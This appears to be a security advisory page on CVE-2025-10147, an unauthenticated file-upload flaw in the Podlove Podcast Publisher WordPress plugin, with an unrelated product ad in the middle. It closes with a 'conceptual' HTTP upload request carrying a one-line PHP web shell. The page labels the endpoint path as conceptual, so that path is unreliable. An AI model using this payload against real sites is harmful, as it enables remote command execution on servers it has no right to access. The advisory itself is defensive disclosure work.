Overview
The Podlove Podcast Publisher plugin for WordPress, widely used for publishing podcasts, contains a critical vulnerability that could potentially allow remote code execution. Identified as CVE-2025-10147, this vulnerability affects all versions up to and including 4.2.6. The flaw lies in the lack of sufficient file type validation in the ‘move_as_original_file’ function, allowing attackers to upload arbitrary files to the server of the affected site.
This vulnerability is significant due to its potential impact on a broad range of WordPress sites using this plugin, and underscores the importance of plugin security in the broader context of website security. The fact that the vulnerability can be exploited by unauthenticated attackers makes it even more critical.
Vulnerability Summary
CVE ID: CVE-2025-10147
Severity: Critical (CVSS: 9.8)
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: Potential system compromise or data leakage
Affected Products
Share secrets securely
Ameeba is private infrastructure for communication and sensitive work built on encrypted identity instead of exposed corporate identity systems.
Passwords, credentials, confidential files, screenshots, internal discussions, sensitive AI context, and private coordination should not become exposed across ordinary communication platforms.
- • Encrypted identity
- • Private Spaces for organizations and teams
- • End-to-end encrypted chat, calls, files, and notes
- • Sensitive AI work and protected collaboration
- • Built for information that cannot leak
Our mission is to secure human work alongside AI.
Product | Affected Versions
Podlove Podcast Publisher Plugin for WordPress | Up to and including 4.2.6
How the Exploit Works
The vulnerability resides within the ‘move_as_original_file’ function of the Podlove Podcast Publisher plugin. This function lacks sufficient validation of file types before moving uploads to their destination on the server. As a result, an attacker can exploit this function by uploading a malicious file, which then resides on the server. Given the correct conditions, this file could be executed, leading to a remote code execution vulnerability.
Conceptual Example Code
The following is a conceptual example of how an attacker might exploit this vulnerability using an HTTP POST request to upload a malicious file:
POST /wp-content/plugins/podlove-podcasting-plugin-for-wordpress/lib/modules/asset_validation/move_as_original_file.php HTTP/1.1
Host: target.example.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="file"; filename="exploit.php"
Content-Type: application/php
<?php echo shell_exec($_GET['cmd']); ?>
------WebKitFormBoundary7MA4YWxkTrZu0gW--
This example attempts to upload a PHP file that would execute arbitrary shell commands when accessed with the appropriate ‘cmd’ parameter in the query string.
Note that this is a conceptual example and actual exploitation would depend on the specific configuration and state of the targeted server.
